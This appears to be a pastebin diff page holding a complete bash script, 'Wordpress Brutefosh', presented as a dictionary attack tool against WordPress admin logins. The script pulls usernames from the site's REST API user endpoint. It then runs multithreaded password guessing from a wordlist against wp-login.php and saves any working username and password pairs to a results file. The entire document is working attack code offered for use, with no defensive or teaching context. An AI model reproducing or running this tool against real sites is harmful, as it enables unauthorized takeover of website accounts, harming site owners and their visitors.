View difference between Paste ID: <a href="/WaQUYNW1">WaQUYNW1</a> and <a href="/z1VikwBP">z1VikwBP</a>

#!/bin/bash
1		#!/bin/bash
2		# Name : Wordpress Brutefosh
3		# Version : 1.2
4		# Desc. : Dictionary Attack Tool - Wordpress Admin
5		# Coded by : Schopath
6		# Website : www.zerobyte.id
7		# Updated on : 2019-03-28
8
9		#----------- CONFIGURATION -----------
10		curl_timeout=20
11		multithread_limit=10
12		#--------- CONFIGURATION EOF ---------
13
14		if [[ -f wpusername.tmp ]]
15		then
16		rm wpusername.tmp
17		fi
18		RED='\e[31m'
19		GRN='\e[32m'
20		YEL='\e[33m'
21		CLR='\e[0m'
22
23		function _GetUserWPJSON() {
24		Target="${1}";
25		UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" \| grep -Po '"slug":"\K.*?(?=")');
26		echo ""
27		if [[ -z ${UsernameLists} ]];
28		then
29		echo -e "${YEL}INFO: Cannot detect Username!${CLR}"
30		else
31		echo -ne > wpusername.tmp
32		for Username in ${UsernameLists};
33		do
34		echo "INFO: Found username \"${Username}\"..."
35		echo "${Username}" >> wpusername.tmp
36		done
37		fi
38		}
39
40		function _TestLogin() {
41		Target="${1}"
42		Username="${2}"
43		Password="${3}"
44		LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed)
45		if [[ ! -z $(echo ${LetsTry} \| grep login_error \| grep div) ]];
46		then
47		echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
48		elif [[ $(echo ${LetsTry} \| grep "HTTP_STATUS_CODE_X" \| awk '{print $2}') == "302" ]];
49		then
50		echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}"
51		echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt
52		else
53		echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
54		fi
55		}
56
57		echo ' _ _ _ '
58		echo '\| \| \| \| ___ _ __ __\| \|_ __ _ __ ___ ___ ___ '
59		echo '\| \|/\\| \|/ _ \\| `__/ _` \| `_ \\| `__/ _ \/ __/ __\|'
60		echo '\ /\ / (_) \| \| \| (_\| \| \|_) \| \| \| __/\__ \__ \'
61		echo ' \/ \/ \___/\|_\| \__,_\| .__/\|_\| \___\|\|___/___/'
62		echo ' \|_\|.::Brutefo(sh) 2019::.'
63		echo ''
64
65		echo -ne "[?] Input website target : "
66		read Target
67
68		curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp
69		if [[ -z $(cat wplogin.tmp \| grep "wp-submit") ]];
70		then
71		echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}"
72		exit
73		fi
74
75		echo -ne "[?] Input password lists in (file) : "
76		read PasswordLists
77
78		if [[ ! -f ${PasswordLists} ]]
79		then
80		echo -e "${RED}ERROR: Wordlists not found!${CLR}"
81		exit
82		fi
83
84		_GetUserWPJSON ${Target}
85
86		if [[ -f wpusername.tmp ]]
87		then
88		for User in $(cat wpusername.tmp)
89		do
90		(
91		for Pass in $(cat ${PasswordLists})
92		do
93		((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
94		_TestLogin ${Target} ${User} ${Pass} &
95		done
96		wait
97		)
98		done
99		else
100		echo -e "${YEL}INFO: Cannot find username${CLR}"
101		echo -ne "[?] Input username manually : "
102		read User
103
104		if [[ -z ${PasswordLists} ]]
105		then
106		echo -e "${RED}ERROR: Username cannot be empty!${CLR}"
107		exit
108		fi
109		echo ''
110		(
111		for Pass in $(cat ${PasswordLists})
112		do
113		((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
114		_TestLogin ${Target} ${User} ${Pass} &
115		done
116		wait
117		)
118		fi
119		echo "INFO: Found $(cat wpbf-results.txt \| grep ${Target} \| sort -nr \| uniq \| wc -l) username & password in ./wpbf-results.txt"